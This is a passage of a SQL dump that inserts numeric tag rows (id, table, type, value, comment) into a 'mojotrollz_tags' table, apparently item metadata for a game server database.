`comment`) VALUES (7037, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7038, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7038, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7039, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7039, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7040, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7040, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7041, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7041, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7042, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7042, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7043, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7043, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7044, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7044, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7045, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7045, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7046, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7046, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7047, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7047, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7048, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7048, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7049, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7049, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7050, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7050, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7051, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7051, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7052, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7052, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7053, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7053, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7055, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7055, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7056, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7056, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7057, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7057, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7067, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7067, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7067, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7067, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7067, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7068, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7068, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7069, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7069, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7070, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7070, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7071, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7071, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7072, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7072, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7075, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7075, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7076, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7076, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7076, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7077, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7077, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7077, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7078, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7078, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7078, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7079, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7079, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7079, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7086, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7086, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7087, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7087, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7087, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7087, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7087, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7088, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7088, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7088, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7088, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7088, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7088, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7089, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7089, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7091, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7092, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7092, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7093, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7093, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7097, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7097, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7098, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7098, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7099, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7099, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7100, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7100, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7101, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7101, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7104, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7104, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7105, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7105, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7106, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7106, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7107, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7107, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7108, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7108, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7109, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7109, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7110, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7110, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7111, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7111, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7112, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7112, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7113, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7113, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7114, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7114, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7115, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7115, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7118, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7118, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7120, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7120, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7125, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7125, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7126, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7126, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7132, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7132, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7135, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7136, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7136, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7137, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7137, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7138, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7138, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7139, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7139, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7149, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7149, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7153, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7153, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7154, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7154, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7155, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7155, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7156, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7156, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7157, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7157, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7158, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7158, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7161, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7161, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7161, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7161, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7161, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7166, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7166, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7166, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7166, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7166, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7167, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7168, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7170, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7170, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7172, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7175, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7175, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7175, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7206, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7206, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7206, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7207, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7207, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7208, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7208, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7209, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7226, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7228, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7230, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7230, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7230, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7230, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7230, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7230, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7231, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7231, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7231, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7231, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7231, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7231, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7232, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7232, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7233, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7233, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7233, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7233, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7233, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7234, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7234, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7235, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7235, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7246, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7246, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7246, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7247, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7247, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7247, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7266, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7267, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7267, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7267, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7268, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7268, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7268, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7269, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7269, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7269, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7271, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7271, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7271, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7272, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7272, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7272, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7273, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7274, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7274, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7274, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7275, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7276, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7286, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7287, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7287, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7287, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7287, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7287, 1, 30, 